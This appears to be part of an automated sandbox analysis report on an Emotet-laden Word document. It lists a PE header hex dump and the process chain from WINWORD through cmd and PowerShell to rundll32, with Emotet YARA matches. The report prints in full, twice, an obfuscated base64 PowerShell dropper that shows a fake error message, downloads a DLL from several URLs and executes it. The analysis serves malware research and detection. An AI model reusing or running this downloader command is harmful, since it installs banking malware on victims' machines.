                                        Data Raw: 33 64 30 31 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 ae 84 0a 60 00 00 00 00 00 00 00 00 e0 00 0e 21 0b 01 02 32 00 40 00 00 00 12 05 00 00 00 00 00 30 16 00 00 00 10 00 00 00 50 00 00 00 00 00 10 00 10 00 00 00 02 00 00 03 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 d0 05 00 00 04 00 00 de dd 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e8 60 00 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 05 00 58 15 00 00 00 c0 05 00 e4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 61 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a5 36 00 00 00 10 00 00 00 38 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 24 00 00 00 00 50 00 00 00 02 00 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 90 04 00 00 00 60 00 00 00 04 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 34 00 00 9c 05 05 00 00 70 00 00 00 06 05 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 38 00 00 64 00 00 00 00 80 05 00 00 02 00 00 00 48 05 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 2e 74 65 78 74 37 00 00 64 00 00 00 00 90 05 00 00 02 00 00 00 4a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 2e 74 65 78 74 36 00 00 64 00 00 00 00 a0 05 00 00 02 00 00 00 4c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 2e 74 65 78 74 35 00 00 64 00 00 00 00 b0 05 00 00 02 00 00 00 4e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 2e 72 65 6c 6f 63 00 00 e4 03 00 00 00 c0 05 00 00 04 00 00 00 50 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                        Data Ascii: 3d01MZ@!L!This program cannot be run in DOS mode.$PEL`!2@0P`dTXa`.text68 `.rdata$P<@@.data`>@.text4pB@.text8dH @.text7dJ @.text6dL @.text5dN @.relocP@B


                                        Code Manipulations

                                        Statistics

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Start time:18:40:41
                                        Start date:25/01/2021
                                        Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        Wow64 process (32bit):false
                                        Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                        Imagebase:0x13f4a0000
                                        File size:1424032 bytes
                                        MD5 hash:95C38D04597050285A18F66039EDB456
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:18:40:42
                                        Start date:25/01/2021
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAHMAZQBUAC0AVgBhAHIASQBhAGIAbABlACAAIAAoACcARwAnACsAJwBIAHAAJwApACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADMAfQB7ADIAfQB7ADUAfQB7ADQAfQB7ADYAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcAWQAnACwAJwBUAE8AUgAnACwAJwBZACcALAAnAFMAJwAsACcASQByACcALAAnAHMAdABlAG0ALgBJAG8ALgBkACcALAAnAEUAQwAnACkAIAAgACkAIAAgADsAIAAgACAAJABYAG8AMwA3AHQAIAAgAD0AIAAgAFsAVABZAHAARQBdACgAIgB7ADIAfQB7ADMAfQB7ADEAfQB7ADAAfQB7ADQAfQAiAC0AZgAnAE4AdABNAEEAbgBhAEcAZQAnACwAJwBtAC4AbgBFAHQALgBTAEUAUgBWAEkAQwBlAFAAbwBpACcALAAnAHMAWQBzAFQAJwAsACcAZQAnACwAJwBSACcAKQA7ACAAJABNAHAAZAB5AHIAXwAxAD0AJABOADUAXwBHACAAKwAgAFsAYwBoAGEAcgBdACgAMwAzACkAIAArACAAJABIADkAMgBLADsAJABHADgANQBWAD0AKAAnAFAAJwArACgAJwA1ACcAKwAnADcAQgAnACkAKQA7ACAAIAAoACAAIABpAFQAZQBNACAAKAAnAFYAQQAnACsAJwBSAGkAYQBiAEwAJwArACcAZQA6AEcASABQACcAKQApAC4AdgBBAGwAdQBlADoAOgAiAEMAUgBFAGAAQQB0AGAARQBEAGAAaQByAEUAQwB0AE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0ATwAzAHAAcAAxAGIAJwArACcANQB7ACcAKwAnADAAfQAnACsAKAAnAFkAOAA0AHYAaABkACcAKwAnAGgAJwApACsAJwB7ADAAfQAnACkAIAAgAC0ARgAgAFsAQwBIAGEAcgBdADkAMgApACkAOwAkAEMANAA2AFIAPQAoACcAQgA0ACcAKwAnADEASwAnACkAOwAgACgAIABkAGkAcgAgACAAdgBhAFIASQBhAEIAbABFADoAWABPADMANwB0ACAAIAApAC4AVgBhAGwAVQBlADoAOgAiAFMAZQBDAFUAcgBJAHQAYAB5AFAAcgBvAHQAbwBgAEMAYABvAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAxACcAKQArACcAMgAnACkAOwAkAEkANQAzAEgAPQAoACgAJwBDADEAJwArACcANQAnACkAKwAnAEUAJwApADsAJABQAGYAXwB3AHkAcwAzACAAPQAgACgAKAAnAEEAJwArACcANAAxACcAKQArACcATwAnACkAOwAkAEUANAAyAFQAPQAoACgAJwBEADcAJwArACcAMQAnACkAKwAnAEgAJwApADsAJABJADMAegAyAGMAcwByAD0AJABIAE8ATQBFACsAKAAoACgAJwBGAFoAbwBPACcAKwAnADMAJwArACcAcABwADEAJwApACsAKAAnAGIANQBGAFoAJwArACcAbwBZADgAJwArACcANAB2AGgAJwApACsAJwBkACcAKwAnAGgAJwArACgAJwBGAFoAJwArACcAbwAnACkAKQAuACIAcgBFAFAAYABMAGAAQQBDAEUAIgAoACgAJwBGACcAKwAnAFoAbwAnACkALABbAFMAVABSAGkAbgBHAF0AWwBjAGgAQQByAF0AOQAyACkAKQArACQAUABmAF8AdwB5AHMAMwArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQARQAwADQARQA9ACgAKAAnAFoAJwArACcAOQA5ACcAKQArACcAUQAnACkAOwAkAFMAOAA0AGgAOQBoAG4APQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABGAG8AdQBvADEAaAAxAD0AKAAoACcAeAAgACcAKwAnAFsAJwArACcAIABzAGgAIABiACcAKwAnADoALwAvAHUAJwApACsAKAAnAGEAZwAnACsAJwByACcAKQArACcAaQB0ACcAKwAnAGUAYwAnACsAJwBoACcAKwAoACcALgAnACsAJwBjAG8AJwApACsAKAAnAG0AJwArACcALwBjACcAKwAnAGcAaQAtAGIAJwApACsAJwBpACcAKwAoACcAbgAvACcAKwAnAGEANQBHACcAKwAnAC8AIQB4ACcAKQArACcAIABbACcAKwAoACcAIAAnACsAJwBzAGgAJwArACcAIAAnACsAJwBiADoALwAvACcAKwAnAHcAdwB3AC4AOQAxAHkAJwApACsAKAAnAHUAZABhACcAKwAnAG8AJwArACcALgBjAG8AJwApACsAKAAnAG0ALwB3AHAAJwArACcALQAnACsAJwBhAGQAJwApACsAKAAnAG0AaQBuAC8AJwArACcASwBLAEgAJwArACcAdAAnACkAKwAoACcAMQAvACEAeAAgAFsAJwArACcAIAAnACsAJwBzAGgAIABiACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwB5AG8AJwArACcAdQByAGMAJwApACsAKAAnAGwAZQBhAG4AZQByAHMAdQByACcAKwAnAGYAYQAnACsAJwBjAGUAJwArACcAcwAnACkAKwAoACcALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwBmAG8AJwArACcAdQByAC0AJwApACsAKAAnAG0AJwArACcAbwBuACcAKwAnAGsAcwAtAGEAYwBhAHMAegAvAE8AJwApACsAJwAyAG0AJwArACcAeQAnACsAKAAnAC8AIQB4ACAAJwArACcAWwAnACkAKwAnACAAcwAnACsAKAAnAGgAJwArACcAIABiADoAJwArACcALwAnACsAJwAvAGwAYQB5AG0AYQBuACcAKQArACgAJwBjAG8AJwArACcAZAAnACkAKwAnAGUAcgAnACsAJwAuAGMAJwArACcAbwAnACsAKAAnAG0ALwAnACsAJwByACcAKQArACgAJwB1AHMAdABpAGMALQBkAGUAYwAnACsAJwBvACcAKwAnAHIAJwApACsAKAAnAC0AMQBnACcAKwAnAGIAJwArACcAYQBkAC8AVQBzAC8AIQB4ACAAWwAgACcAKQArACgAJwBzAGgAIAAnACsAJwBiAHMAOgAvAC8AJwArACcAcgBiACcAKwAnAGQAJwApACsAJwBjAGsAJwArACcALgAnACsAKAAnAGMAJwArACcAbwBtAC8AJwApACsAKAAnAHcAcAAtAGMAJwArACcAbwBuAHQAJwApACsAKAAnAGUAbgAnACsAJwB0ACcAKQArACgAJwAvAHUAJwArACcAcABsAG8AYQBkAHMALwBzAHUAYwAnACsAJwB1ACcAKwAnAHIAaQAvAGwAZQAnACsAJwB3AGYAJwApACsAKAAnAEsALwAhACcAKwAnAHgAIAAnACkAKwAnAFsAIAAnACsAJwBzAGgAJwArACcAIABiACcAKwAnAHMAJwArACcAOgAvACcAKwAoACcALwBmAGkAZgBhACcAKwAnAGMAbwBpACcAKwAnAG4AcwBiAG8AJwArACcAeAAuAGMAJwApACsAKAAnAG8AJwArACcAbQAvAHcAJwApACsAKAAnAHAALQAnACsAJwBjACcAKQArACgAJwBvACcAKwAnAG4AdAAnACsAJwBlAG4AdAAvADcAZwBZACcAKQArACgAJwB0AC8AIQAnACsAJwB4ACAAJwApACsAKAAnAFsAJwArACcAIABzAGgAIAAnACsAJwBiACcAKwAnADoALwAvAHMAZQBhAG0AYQAnACkAKwAnAHIAdAAnACsAKAAnAC4AaQAnACsAJwBuAGYAJwApACsAJwBvACcAKwAoACcALwBhACcAKwAnAGwAZgBhACcAKwAnAGMAZwBpAGEAcABpACcAKQArACgAJwAvAHEAJwArACcAOQAyAEEALwAnACkAKQAuACIAUgBlAHAATABgAEEAYABjAGUAIgAoACgAJwB4ACcAKwAoACcAIABbACcAKwAnACAAcwAnACkAKwAoACcAaAAnACsAJwAgAGIAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAG4AagAnACwAJwB0AHIAJwApACwAJwB5AGoAJwAsACcAcwBjACcALAAkAFMAOAA0AGgAOQBoAG4ALAAnAHcAZAAnACkAWwAzAF0AKQAuACIAcwBQAEwAYABJAHQAIgAoACQAWAA1ADIAUgAgACsAIAAkAE0AcABkAHkAcgBfADEAIAArACAAJABQAF8ANQBUACkAOwAkAFUANABfAFgAPQAoACcAVAAyACcAKwAnADMARQAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEkAagB2AHoAZwBfAHIAIABpAG4AIAAkAEYAbwB1AG8AMQBoADEAKQB7AHQAcgB5AHsAKAAmACgAJwBOAGUAdwAtACcAKwAnAE8AJwArACcAYgBqAGUAYwB0ACcAKQAgAFMAWQBzAHQARQBtAC4ATgBlAHQALgB3AGUAYgBjAGwAaQBlAE4AVAApAC4AIgBEAE8AdwBuAGAAbABPAEEAZABgAEYASQBsAGUAIgAoACQASQBqAHYAegBnAF8AcgAsACAAJABJADMAegAyAGMAcwByACkAOwAkAFMANABfAFAAPQAoACgAJwBGACcAKwAnADgAMwAnACkAKwAnAEIAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQB0AGUAJwArACcAbQAnACkAIAAkAEkAMwB6ADIAYwBzAHIAKQAuACIAbABFAGAATgBnAFQAaAAiACAALQBnAGUAIAAzADYAMQAzADAAKQAgAHsALgAoACcAcgB1AG4AZABsACcAKwAnAGwAMwAnACsAJwAyACcAKQAgACQASQAzAHoAMgBjAHMAcgAsACgAJwBBACcAKwAnAG4AJwArACcAeQAnACsAKAAnAFMAdAByAGkAbgAnACsAJwBnACcAKQApAC4AIgB0AG8AUwBgAFQAcgBgAEkATgBHACIAKAApADsAJABOADUAOQBYAD0AKAAnAEYAJwArACgAJwA1ADgAJwArACcAUQAnACkAKQA7AGIAcgBlAGEAawA7ACQARgA0ADUAWAA9ACgAKAAnAFoANQAnACsAJwAzACcAKQArACcASwAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAE0ANwBfAEMAPQAoACcATQA2ACcAKwAnADgAVwAnACkA
                                        Imagebase:0x4a590000
                                        File size:345088 bytes
                                        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate

                                        General

                                        Start time:18:40:43
                                        Start date:25/01/2021
                                        Path:C:\Windows\System32\msg.exe
                                        Wow64 process (32bit):false
                                        Commandline:msg user /v Word experienced an error trying to open the file.
                                        Imagebase:0xff9c0000
                                        File size:26112 bytes
                                        MD5 hash:2214979661E779C3E3C33D4F14E6F3AC
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate

                                        General

                                        Start time:18:40:43
                                        Start date:25/01/2021
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:powershell -w hidden -enc IAAgAHMAZQBUAC0AVgBhAHIASQBhAGIAbABlACAAIAAoACcARwAnACsAJwBIAHAAJwApACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADMAfQB7ADIAfQB7ADUAfQB7ADQAfQB7ADYAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcAWQAnACwAJwBUAE8AUgAnACwAJwBZACcALAAnAFMAJwAsACcASQByACcALAAnAHMAdABlAG0ALgBJAG8ALgBkACcALAAnAEUAQwAnACkAIAAgACkAIAAgADsAIAAgACAAJABYAG8AMwA3AHQAIAAgAD0AIAAgAFsAVABZAHAARQBdACgAIgB7ADIAfQB7ADMAfQB7ADEAfQB7ADAAfQB7ADQAfQAiAC0AZgAnAE4AdABNAEEAbgBhAEcAZQAnACwAJwBtAC4AbgBFAHQALgBTAEUAUgBWAEkAQwBlAFAAbwBpACcALAAnAHMAWQBzAFQAJwAsACcAZQAnACwAJwBSACcAKQA7ACAAJABNAHAAZAB5AHIAXwAxAD0AJABOADUAXwBHACAAKwAgAFsAYwBoAGEAcgBdACgAMwAzACkAIAArACAAJABIADkAMgBLADsAJABHADgANQBWAD0AKAAnAFAAJwArACgAJwA1ACcAKwAnADcAQgAnACkAKQA7ACAAIAAoACAAIABpAFQAZQBNACAAKAAnAFYAQQAnACsAJwBSAGkAYQBiAEwAJwArACcAZQA6AEcASABQACcAKQApAC4AdgBBAGwAdQBlADoAOgAiAEMAUgBFAGAAQQB0AGAARQBEAGAAaQByAEUAQwB0AE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0ATwAzAHAAcAAxAGIAJwArACcANQB7ACcAKwAnADAAfQAnACsAKAAnAFkAOAA0AHYAaABkACcAKwAnAGgAJwApACsAJwB7ADAAfQAnACkAIAAgAC0ARgAgAFsAQwBIAGEAcgBdADkAMgApACkAOwAkAEMANAA2AFIAPQAoACcAQgA0ACcAKwAnADEASwAnACkAOwAgACgAIABkAGkAcgAgACAAdgBhAFIASQBhAEIAbABFADoAWABPADMANwB0ACAAIAApAC4AVgBhAGwAVQBlADoAOgAiAFMAZQBDAFUAcgBJAHQAYAB5AFAAcgBvAHQAbwBgAEMAYABvAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAxACcAKQArACcAMgAnACkAOwAkAEkANQAzAEgAPQAoACgAJwBDADEAJwArACcANQAnACkAKwAnAEUAJwApADsAJABQAGYAXwB3AHkAcwAzACAAPQAgACgAKAAnAEEAJwArACcANAAxACcAKQArACcATwAnACkAOwAkAEUANAAyAFQAPQAoACgAJwBEADcAJwArACcAMQAnACkAKwAnAEgAJwApADsAJABJADMAegAyAGMAcwByAD0AJABIAE8ATQBFACsAKAAoACgAJwBGAFoAbwBPACcAKwAnADMAJwArACcAcABwADEAJwApACsAKAAnAGIANQBGAFoAJwArACcAbwBZADgAJwArACcANAB2AGgAJwApACsAJwBkACcAKwAnAGgAJwArACgAJwBGAFoAJwArACcAbwAnACkAKQAuACIAcgBFAFAAYABMAGAAQQBDAEUAIgAoACgAJwBGACcAKwAnAFoAbwAnACkALABbAFMAVABSAGkAbgBHAF0AWwBjAGgAQQByAF0AOQAyACkAKQArACQAUABmAF8AdwB5AHMAMwArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQARQAwADQARQA9ACgAKAAnAFoAJwArACcAOQA5ACcAKQArACcAUQAnACkAOwAkAFMAOAA0AGgAOQBoAG4APQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABGAG8AdQBvADEAaAAxAD0AKAAoACcAeAAgACcAKwAnAFsAJwArACcAIABzAGgAIABiACcAKwAnADoALwAvAHUAJwApACsAKAAnAGEAZwAnACsAJwByACcAKQArACcAaQB0ACcAKwAnAGUAYwAnACsAJwBoACcAKwAoACcALgAnACsAJwBjAG8AJwApACsAKAAnAG0AJwArACcALwBjACcAKwAnAGcAaQAtAGIAJwApACsAJwBpACcAKwAoACcAbgAvACcAKwAnAGEANQBHACcAKwAnAC8AIQB4ACcAKQArACcAIABbACcAKwAoACcAIAAnACsAJwBzAGgAJwArACcAIAAnACsAJwBiADoALwAvACcAKwAnAHcAdwB3AC4AOQAxAHkAJwApACsAKAAnAHUAZABhACcAKwAnAG8AJwArACcALgBjAG8AJwApACsAKAAnAG0ALwB3AHAAJwArACcALQAnACsAJwBhAGQAJwApACsAKAAnAG0AaQBuAC8AJwArACcASwBLAEgAJwArACcAdAAnACkAKwAoACcAMQAvACEAeAAgAFsAJwArACcAIAAnACsAJwBzAGgAIABiACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwB5AG8AJwArACcAdQByAGMAJwApACsAKAAnAGwAZQBhAG4AZQByAHMAdQByACcAKwAnAGYAYQAnACsAJwBjAGUAJwArACcAcwAnACkAKwAoACcALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwBmAG8AJwArACcAdQByAC0AJwApACsAKAAnAG0AJwArACcAbwBuACcAKwAnAGsAcwAtAGEAYwBhAHMAegAvAE8AJwApACsAJwAyAG0AJwArACcAeQAnACsAKAAnAC8AIQB4ACAAJwArACcAWwAnACkAKwAnACAAcwAnACsAKAAnAGgAJwArACcAIABiADoAJwArACcALwAnACsAJwAvAGwAYQB5AG0AYQBuACcAKQArACgAJwBjAG8AJwArACcAZAAnACkAKwAnAGUAcgAnACsAJwAuAGMAJwArACcAbwAnACsAKAAnAG0ALwAnACsAJwByACcAKQArACgAJwB1AHMAdABpAGMALQBkAGUAYwAnACsAJwBvACcAKwAnAHIAJwApACsAKAAnAC0AMQBnACcAKwAnAGIAJwArACcAYQBkAC8AVQBzAC8AIQB4ACAAWwAgACcAKQArACgAJwBzAGgAIAAnACsAJwBiAHMAOgAvAC8AJwArACcAcgBiACcAKwAnAGQAJwApACsAJwBjAGsAJwArACcALgAnACsAKAAnAGMAJwArACcAbwBtAC8AJwApACsAKAAnAHcAcAAtAGMAJwArACcAbwBuAHQAJwApACsAKAAnAGUAbgAnACsAJwB0ACcAKQArACgAJwAvAHUAJwArACcAcABsAG8AYQBkAHMALwBzAHUAYwAnACsAJwB1ACcAKwAnAHIAaQAvAGwAZQAnACsAJwB3AGYAJwApACsAKAAnAEsALwAhACcAKwAnAHgAIAAnACkAKwAnAFsAIAAnACsAJwBzAGgAJwArACcAIABiACcAKwAnAHMAJwArACcAOgAvACcAKwAoACcALwBmAGkAZgBhACcAKwAnAGMAbwBpACcAKwAnAG4AcwBiAG8AJwArACcAeAAuAGMAJwApACsAKAAnAG8AJwArACcAbQAvAHcAJwApACsAKAAnAHAALQAnACsAJwBjACcAKQArACgAJwBvACcAKwAnAG4AdAAnACsAJwBlAG4AdAAvADcAZwBZACcAKQArACgAJwB0AC8AIQAnACsAJwB4ACAAJwApACsAKAAnAFsAJwArACcAIABzAGgAIAAnACsAJwBiACcAKwAnADoALwAvAHMAZQBhAG0AYQAnACkAKwAnAHIAdAAnACsAKAAnAC4AaQAnACsAJwBuAGYAJwApACsAJwBvACcAKwAoACcALwBhACcAKwAnAGwAZgBhACcAKwAnAGMAZwBpAGEAcABpACcAKQArACgAJwAvAHEAJwArACcAOQAyAEEALwAnACkAKQAuACIAUgBlAHAATABgAEEAYABjAGUAIgAoACgAJwB4ACcAKwAoACcAIABbACcAKwAnACAAcwAnACkAKwAoACcAaAAnACsAJwAgAGIAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAG4AagAnACwAJwB0AHIAJwApACwAJwB5AGoAJwAsACcAcwBjACcALAAkAFMAOAA0AGgAOQBoAG4ALAAnAHcAZAAnACkAWwAzAF0AKQAuACIAcwBQAEwAYABJAHQAIgAoACQAWAA1ADIAUgAgACsAIAAkAE0AcABkAHkAcgBfADEAIAArACAAJABQAF8ANQBUACkAOwAkAFUANABfAFgAPQAoACcAVAAyACcAKwAnADMARQAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEkAagB2AHoAZwBfAHIAIABpAG4AIAAkAEYAbwB1AG8AMQBoADEAKQB7AHQAcgB5AHsAKAAmACgAJwBOAGUAdwAtACcAKwAnAE8AJwArACcAYgBqAGUAYwB0ACcAKQAgAFMAWQBzAHQARQBtAC4ATgBlAHQALgB3AGUAYgBjAGwAaQBlAE4AVAApAC4AIgBEAE8AdwBuAGAAbABPAEEAZABgAEYASQBsAGUAIgAoACQASQBqAHYAegBnAF8AcgAsACAAJABJADMAegAyAGMAcwByACkAOwAkAFMANABfAFAAPQAoACgAJwBGACcAKwAnADgAMwAnACkAKwAnAEIAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQB0AGUAJwArACcAbQAnACkAIAAkAEkAMwB6ADIAYwBzAHIAKQAuACIAbABFAGAATgBnAFQAaAAiACAALQBnAGUAIAAzADYAMQAzADAAKQAgAHsALgAoACcAcgB1AG4AZABsACcAKwAnAGwAMwAnACsAJwAyACcAKQAgACQASQAzAHoAMgBjAHMAcgAsACgAJwBBACcAKwAnAG4AJwArACcAeQAnACsAKAAnAFMAdAByAGkAbgAnACsAJwBnACcAKQApAC4AIgB0AG8AUwBgAFQAcgBgAEkATgBHACIAKAApADsAJABOADUAOQBYAD0AKAAnAEYAJwArACgAJwA1ADgAJwArACcAUQAnACkAKQA7AGIAcgBlAGEAawA7ACQARgA0ADUAWAA9ACgAKAAnAFoANQAnACsAJwAzACcAKQArACcASwAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAE0ANwBfAEMAPQAoACcATQA2ACcAKwAnADgAVwAnACkA
                                        Imagebase:0x13fcc0000
                                        File size:473600 bytes
                                        MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Reputation:high

                                        General

                                        Start time:18:41:12
                                        Start date:25/01/2021
                                        Path:C:\Windows\System32\rundll32.exe
                                        Wow64 process (32bit):false
                                        Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\O3pp1b5\Y84vhdh\A41O.dll AnyString
                                        Imagebase:0xff090000
                                        File size:45568 bytes
                                        MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate

                                        General

                                        Start time:18:41:12
                                        Start date:25/01/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\O3pp1b5\Y84vhdh\A41O.dll AnyString
                                        Imagebase:0xd10000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2171985440.0000000000160000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2172275535.0000000000210000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2179031474.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                        Reputation:moderate

                                        General

                                        Start time:18:41:19
                                        Start date:25/01/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\O3pp1b5\Y84vhdh\A41O.dll',#1
                                        Imagebase:0xd10000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2184720444.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2183134792.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2183096664.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security
                                        Reputation:moderate

                                        General

                                        Start time:18:41:25
                                        Start date:25/01/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eeyfocnhd\rdcslqee.tfa',YbeYBwKPvEN
                                        Imagebase:0xd10000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2193942063.00000000002B0000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2198337513.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2193919576.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security
                                        Reputation:moderate

                                        General

                                        Start time:18:41:30
                                        Start date:25/01/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eeyfocnhd\rdcslqee.tfa',#1
                                        Imagebase:0xd10000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2208899018.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2206030341.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2205979964.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security
                                        Reputation:moderate

                                        General

                                        Start time:18:41:36
                                        Start date:25/01/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ildimivpppjhtpz\eazqsushdwhbfu.ifu',kkHcNcnl
                                        Imagebase:0xd10000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
